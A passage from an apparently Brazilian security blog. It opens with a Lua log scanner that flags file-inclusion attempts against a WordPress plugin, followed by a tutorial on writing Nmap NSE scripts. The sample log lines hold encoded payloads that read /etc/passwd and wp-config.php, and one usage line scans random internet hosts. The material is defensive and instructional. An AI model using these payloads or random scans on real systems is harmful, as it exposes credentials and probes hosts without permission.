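-- Decode %XX escapes so URL-encoded '=' padding (e.g. %3D%3D) still decodes.
local function urldecode(s)
  return (s:gsub("%%(%x%x)", function(h) return string.char(tonumber(h, 16)) end))
end

-- Returns the decoded payload plus a reason when the value is suspicious, else nil.
local function classify_l_param(raw)
  local decoded = b64decode(urldecode(raw))
  if not decoded then return nil end
  local lower = decoded:lower()
  if lower:find("^php://") or lower:find("^file://") or lower:find("^data:")
     or lower:find("^expect://") or lower:find("^phar://") then
    return decoded, "stream wrapper"
  end
  if decoded:find("%.%./") or decoded:find("%.%.\\") then
    return decoded, "path traversal"
  end
  if decoded:find("^/") then
    return decoded, "absolute path"
  end
  return nil
end

-- Pull the request path and the l= value out of a combined-format access log line.
local function inspect_line(line)
  local request = line:match('"%u+ (%S+) HTTP/')
  if not request or not request:find("/wp%-content/plugins/robotcpa/f%.php") then
    return nil
  end
  local value = request:match("[?&]l=([^&%s]*)")
  if not value then return nil end
  local decoded, reason = classify_l_param(value)
  if decoded then
    return { request = request, decoded = decoded, reason = reason }
  end
  return nil
end

-- Constructed sample log lines (not real traffic); the first two carry the
-- payloads from the advisory, the third is a harmless value, the fourth is noise.
local SAMPLE_LOG = {
  '203.0.113.5 - - [23/Jun/2015:13:47:40 -0300] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 200 1822 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [23/Jun/2015:13:47:41 -0300] "GET /wp-content/plugins/robotcpa/f.php?l=cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA%3D%3D HTTP/1.1" 200 3211 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [23/Jun/2015:13:50:02 -0300] "GET /wp-content/plugins/robotcpa/f.php?l=aW5kZXg= HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [23/Jun/2015:13:51:10 -0300] "GET /index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
}

local function scan(lines)
  local hits = {}
  for _, line in ipairs(lines) do
    local hit = inspect_line(line)
    if hit then hits[#hits + 1] = hit end
  end
  return hits
end

for _, hit in ipairs(scan(SAMPLE_LOG)) do
  print(string.format("%-15s %s  <- %s", hit.reason, hit.decoded, hit.request))
end
```

Run it with any stock Lua interpreter; the two advisory payloads are reported as "stream wrapper" and the harmless value is ignored. The same <b>classify_l_param</b> function can be reused in an OpenResty access phase to reject such requests before they reach PHP, which is the mitigation until the plugin is removed or patched.<br />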
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>OUTPUT: </b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsf9-WgPXfGwqgd3_zuV1oqHchHnmGoyAH8c-jPHg8MykY8U1HsSumcM7MTSkKDMQHHPxLMooiXKVaMi2Rag1tT8xyRWGWnMOvyPTkABAhCnuAtGchQ_Dhf5H3FBuq1UBsFMlXR3bR_iU/s1600/Captura+de+tela+de+2015-06-23+13%253A47%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsf9-WgPXfGwqgd3_zuV1oqHchHnmGoyAH8c-jPHg8MykY8U1HsSumcM7MTSkKDMQHHPxLMooiXKVaMi2Rag1tT8xyRWGWnMOvyPTkABAhCnuAtGchQ_Dhf5H3FBuq1UBsFMlXR3bR_iU/s640/Captura+de+tela+de+2015-06-23+13%253A47%253A40.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><b>Download:</b></span></span><br />
<span style="font-size: large;"><a href="http://github.com/googleinurl/SCANNER-INURLBR" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">http://github.com/googleinurl/SCANNER-INURLBR</a></span><br />
InurlBR<br />
<br />
2015-06-20 - <b>Nmap Scripting Engine (NSE) - Writing my first script</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrkjG_w0CBS7eP1ausQTEP3PIxuG4x1jCaVhiz_clewBVo666p2NqRsy8qBBN-yTofjpnfEig_fB6a5V76alfOkkTPb7VWIzhBPpqGnlix6L-ZD-vovCmkA9pGjoi-ngKgq60yIKu3908/s1600/banner.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrkjG_w0CBS7eP1ausQTEP3PIxuG4x1jCaVhiz_clewBVo666p2NqRsy8qBBN-yTofjpnfEig_fB6a5V76alfOkkTPb7VWIzhBPpqGnlix6L-ZD-vovCmkA9pGjoi-ngKgq60yIKu3908/s640/banner.png" width="640" /></a></div>
<br />
<h2>
<center>
<span style="color: red;">
Introduction</span></center>
</h2>
<br />
The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It lets users write (and share) simple scripts to automate a wide variety of networking tasks. These scripts run in parallel, with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs. NSE scripts are implemented with the Lua programming language, the Nmap API and a number of really powerful NSE libraries.<br />
<span style="color: red;">LUA: <a href="http://www.dev-hq.net/lua/" target="_blank">Lua Tutorials - www.dev-hq.net</a> NMAP API: <a href="http://nmap.org/book/nse-api.html" target="_blank">Nmap API</a> NSEDOC: <a href="https://nmap.org/nsedoc/" target="_blank">nsedoc (nse)</a></span><br />
<br />
<br />
<b>NSE scripts are grouped into different categories</b>:<br />
auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, vuln<br />
Placing our NSE script in one of these categories lets us run it, together with every other script in that category, with the flag (--script <categoria> <target>). The following<br />
example "will run our script and every script found in the 'discovery' category":<br />
<span style="color: red;">example:</span> nmap -sS -Pn -p 80 --script discovery <target><br />
<br />
<b><br /></b>
<b>NSE scripts are divided into 4 sections</b>:<br />
The '<span style="color: red;">HEAD'</span> contains metadata describing the module's functionality, author, impact, category and other descriptive data.<br />
The <span style="color: red;">'DEPENDENCIES'</span> (the Lua libraries needed) for using the Nmap programming API.<br />
The <span style="color: red;">'RULE SECTION'</span> defines the conditions required for the script to run. This section must contain at least one function from this list: portrule, hostrule, prerule, postrule. For the purposes of this tutorial (and most scripts) I will focus on portrule, which can run checks on both host and port properties before the script runs. In the script below, portrule uses the Nmap API to check whether there is any open HTTP port before executing the commands of the 'action section'.<br />
The <span style="color: red;">'ACTION SECTION'</span> defines the script's logic. In the K&R (Kernighan & Ritchie) tradition I will simply output "Hello, world!" for every open HTTP port, using 'return' to produce the output.<br />
<br />
<br />
<br />
<span style="color: red; font-size: large;"></span><br />
<h2>
<center>
<span style="color: red; font-size: large;"><b>hello.nse</b></span></center>
</h2>
Let's start with a script that simply prints "hello world" for every HTTP port found open.<br />
Open a text editor and save the following snippet as 'hello.nse' in your home directory.<br />
<pre style="background-color: #f8f8f8; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace; font-size: 12px; line-height: 21px; padding: 8px;">
------------------------------ The Head Section ------------------------------
description = [[
Author: r00t-3xp10it
INURLBR AULA - escrevendo o meu primeiro script NSE para o nmap

Some Syntax examples:
nmap --script-help hello.nse
nmap -sS -Pn -p 80 --script hello.nse <target>
]]

author = "r00t-3xp10it"
categories = {"discovery", "safe"}

------------------------------ Dependencies ------------------------------
local http = require "http"
local shortport = require "shortport"

------------------------------ The Rule Section ------------------------------
portrule = shortport.http

------------------------------ The Action Section ------------------------------
action = function(host, port)
  return "Hello world!"
end
</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red;">Description: </span>in the 'head' section we set the categories to 'discovery' and 'safe'; to run this script together with every script in the 'discovery' category we just execute 'nmap -sV -p 80,8080 --script discovery <target>'. In the 'Dependencies' section we load the 'http' and 'shortport' libraries. In 'the rule section' we use the 'shortport' library to check whether the <target> has any open port speaking the 'http' protocol; if so, 'the action section' runs and 'function(host, port)' returns "hello world!" (displayed in the terminal). P.S. the portrule 'shortport.http' matches every HTTP-based service, like<span style="color: red;">:</span> <span style="white-space: pre-wrap;">http, https, ipp, http-alt, https-alt, vnc-http, oem-agent, </span><span style="white-space: pre-wrap;">soap, http-proxy, (from the description in the 'shortport.lua' library)</span>...</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">shortport.http:</span> <a href="https://nmap.org/nsedoc/lib/shortport.html#http" target="_blank">https://nmap.org/nsedoc/lib/shortport.html#http</a></div>
<div style="text-align: -webkit-center;">
<span style="font-size: large;"></span><span style="color: red;">shortport.lua:</span> <a href="https://svn.nmap.org/nmap/nselib/shortport.lua" target="_blank">nmap.org/nmap/nselib/shortport.lua</a><br />
<br />
<center>
<span style="font-size: large;">hello.nse output:</span></center>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTYSjzAFkbV0_AMZLRYQnr_wP0JnEv6aZUKo_u5WqRo99XmIBKjQgxV8zSM0eVqfFBlKfVvJOxjDtXedyafdnAIDS5oGhTQQUn6l82CSNRzjNEMkWr_HVfRUiB5rNC97bqkp3OkuBzok/s1600/aula1-output.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTYSjzAFkbV0_AMZLRYQnr_wP0JnEv6aZUKo_u5WqRo99XmIBKjQgxV8zSM0eVqfFBlKfVvJOxjDtXedyafdnAIDS5oGhTQQUn6l82CSNRzjNEMkWr_HVfRUiB5rNC97bqkp3OkuBzok/s640/aula1-output.png" width="640" /></a></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>copy the script into the Nmap script database</b> ('/nmap/scripts/' folder)</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo cp hello.nse /usr/share/nmap/scripts/hello.nse</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>update the NSE database</b></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo nmap --script-updatedb</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>view the module description</b></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo nmap --script-help hello.nse</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>run the script</b></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script hello.nse <target></div>
<br /></div>
<div style="text-align: -webkit-center;">
<h2>
<span style="color: red; font-size: large;">file-checker.nse</span></h2>
</div>
Let's build a quick NSE script to check whether the selected /path/file/folder exists on the target web server by checking the Google API return codes. "The default behaviour will be to look for the robots.txt file if no argument (@args) is given to look for a different file/path." The '@args' are passed with the flag --script-args <argument name>=; here it lets the user enter a name other than the default value (/robots.txt) to look for on the target. We will build the next script in 4 sections, 'head, dependencies, the rule section, the action section', for easier understanding:<br />
<br />
<br />
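Before the post's own file-checker.nse, here is an added example of the same idea that is not the author's code: a complete NSE script laid out in the four sections described above, which reads the path from --script-args (default /robots.txt), requests it on every open HTTP service and reports the HTTP status code the target returns. The argument name <b>path</b>, the script file name and the status-to-result mapping are my assumptions, not part of the tutorial.<br />

```lua
-- Added example (not the post's file-checker.nse): path-status.nse
-- Assumed usage: nmap -sV -Pn -p 80,443 --script ./path-status.nse --script-args path=/privacy/ <target>

------------------------------ The Head Section ------------------------------
description = [[
Requests one path on every open HTTP service and reports the status code,
so the operator can see whether a file or folder is exposed on the target.
Default path is /robots.txt; override it with --script-args path=/other.
]]
author = "added example for the INURL BRASIL NSE tutorial"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

------------------------------ Dependencies ------------------------------
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"

------------------------------ The Rule Section ------------------------------
-- Same rule as hello.nse: only run against ports that look like HTTP.
portrule = shortport.http

------------------------------ The Action Section ------------------------------
action = function(host, port)
  -- Script argument with a default, read through the stdnse library.
  local path = stdnse.get_script_args("path") or "/robots.txt"
  if path:sub(1, 1) ~= "/" then path = "/" .. path end

  -- One GET request; the http library picks TLS when the port was
  -- identified as an SSL-wrapped service during version detection.
  local response = http.get(host, port, path)
  if not response or not response.status then
    -- No usable answer (timeout, reset): returning nil prints nothing.
    return nil
  end

  -- Structured output renders cleanly in both normal and XML output.
  local out = stdnse.output_table()
  out.path = path
  out.status = response.status
  if response.status == 200 then
    out.result = "present"
  elseif response.status == 301 or response.status == 302 then
    out.result = "redirect to " .. (response.header["location"] or "?")
  elseif response.status == 403 then
    out.result = "present but forbidden"
  elseif response.status == 404 then
    out.result = "not found"
  else
    out.result = "unexpected status"
  end
  return out
end
```

The design mirrors hello.nse: the rule section stays a one-liner (shortport.http), and all the work happens in the action, which is why NSE can run it in parallel across every matching port. A 403 is reported separately from a 404 because it usually means the path exists but is access-controlled, which is exactly the kind of detail an operator wants before deciding what to look at next.<br />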
<center>
---'THE HEAD SECTION'---</center>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
description <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">[</span><span class="br0" style="color: #66cc66;">[</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Author<span class="sy0" style="color: #66cc66;">:</span> r00t<span class="sy0" style="color: #66cc66;">-</span>3xp10it</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Quick NSE script to check <span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> the selected file<span class="sy0" style="color: #66cc66;">/</span>path<span class="sy0" style="color: #66cc66;">/</span>folder exists</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
on target webserver by checking google API <span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> codes<span class="sy0" style="color: #66cc66;">.</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: #ff6666;">'default behavior its to search for robots.txt file'</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Some Syntax examples<span class="sy0" style="color: #66cc66;">:</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="sy0" style="color: #66cc66;">-</span>sS <span class="sy0" style="color: #66cc66;">-</span>Pn <span class="sy0" style="color: #66cc66;">-</span>p <span class="nu0" style="color: #cc66cc;">80</span> <span class="co1" style="color: grey; font-style: italic;">--script file-checker.nse <target></span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="sy0" style="color: #66cc66;">-</span>sS <span class="sy0" style="color: #66cc66;">-</span>Pn <span class="sy0" style="color: #66cc66;">-</span>p <span class="nu0" style="color: #cc66cc;">80</span> <span class="co1" style="color: grey; font-style: italic;">--script file-checker.nse --script-args file=/privacy/ <target></span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="sy0" style="color: #66cc66;">-</span>sS <span class="sy0" style="color: #66cc66;">-</span>sV <span class="sy0" style="color: #66cc66;">-</span>iR <span class="nu0" style="color: #cc66cc;">40</span> <span class="sy0" style="color: #66cc66;">-</span>p <span class="nu0" style="color: #cc66cc;">80</span> <span class="co1" style="color: grey; font-style: italic;">--open --script file-checker.nse --script-args file=/robots.txt</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #66cc66;">]</span><span class="br0" style="color: #66cc66;">]</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">---</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- @usage</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap --script-help file-checker.nse</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap -sS -Pn -p 80 --script file-checker.nse <target></span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap -sS -Pn -p 80 --script file-checker.nse --script-args file=/robots.txt <target></span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap -sS -Pn -p 80 --script file-checker.nse --script-args file=/privacy/ 113.38.34.72</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- @output</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- PORT STATE SERVICE</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- 80/tcp open http</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- | file-checker: /robots.txt</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- | : STRING FOUND...</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- |_ : returned 200 OK</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- @args file-checker.file the file/path name to search. Default: /robots.txt</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">---</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
author <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"r00t-3xp10it"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
license <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"Same as Nmap--See http://nmap.org/book/man-legal.html"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
categories <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">{</span><span class="st0" style="color: #ff6666;">"discovery"</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"safe"</span><span class="br0" style="color: #66cc66;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #66cc66;"><br /></span></div>
</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<b>---'DEPENDENCIES'---</b></div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- Dependencies (lua libraries)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> shortport <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="st0" style="color: #ff6666;">"shortport"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> stdnse <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="br0" style="color: #66cc66;">(</span><span class="st0" style="color: #ff6666;">'stdnse'</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> http <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="st0" style="color: #ff6666;">"http"</span></div>
</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">shortport:</span> <a href="https://nmap.org/nsedoc/lib/shortport.html" target="_blank">https://nmap.org/nsedoc/lib/shortport.html</a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">stdnse: <a href="https://nmap.org/nsedoc/lib/stdnse.html" target="_blank">https://nmap.org/nsedoc/lib/stdnse.html</a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">http: <a href="https://nmap.org/nsedoc/lib/http.html" target="_blank">https://nmap.org/nsedoc/lib/http.html</a> </span></div>
<br />
<br />
<center>
<span style="text-align: center;"><b>---'THE RULES SECTION'---</b></span></center>
<center>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- Port rule will only execute if port 80/tcp http is open</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
